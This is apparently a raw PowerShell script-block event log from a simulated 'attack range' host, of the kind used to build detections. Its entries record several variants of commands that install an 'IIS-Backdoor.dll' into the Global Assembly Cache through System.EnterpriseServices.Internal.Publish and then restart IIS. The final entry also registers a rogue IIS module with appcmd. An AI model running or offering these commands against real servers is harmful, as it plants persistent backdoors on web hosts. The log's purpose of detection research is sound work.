4104152150x0163088Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211new-object system.enterpriseservices.internal.publishf78c940a-72a5-405e-8e91-c859e74fe871 4104152150x0162926Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211Set-location "C:\windows\system32\inetsrv" [System.Reflection.Assembly]::Load("Atomic.System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a") $publish = New-Object System.EnterpriseServices.Internal.Publish $publish.GacInstall("c:\windows\system32\inetsrv\IIS-Backdoor.dll") iisreset 2a5a2da4-28aa-4da3-ba8a-d5c9489b2050 4104152150x0162822Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211Set-location "C:\windows\system32\inetsrv" [System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a") $publish = New-Object System.EnterpriseServices.Internal.Publish $publish.GacInstall("c:\windows\system32\inetsrv\IIS-Backdoor.dll") iisreset22981287-b894-4316-8991-90da3a5a9f0d 4104152150x0162795Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211Set-location "c:\Folder Path" [System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a") $publish = New-Object System.EnterpriseServices.Internal.Publish $publish.GacInstall("c:\windows\system32\inetsrv\iis-backdoor.dll") iisreset5f48c83c-f54d-44a2-95ca-e77d4700fa94 4104152150x0162651Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211powershell.exe /c powershell [System.reflection.assembly]::load ('system.enterpriseservices, version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'); $publish = new-object system.enterpriseservices.internal.publish;$name = (gi d:\system.web.extension.dll).FullName;$Publish.GacInstall($name);$type = 'system.web.extension.extensionmoduke, ' + [system.reflection.assembly]::getassemblyname($name).fullname; if($name-and$type){c:\windows\system32\inetsrv\appcmd.exe add module /name:anonymouscheckmodule /type:"$type"}96faeb81-6596-4db5-99ee-ff0728a5c103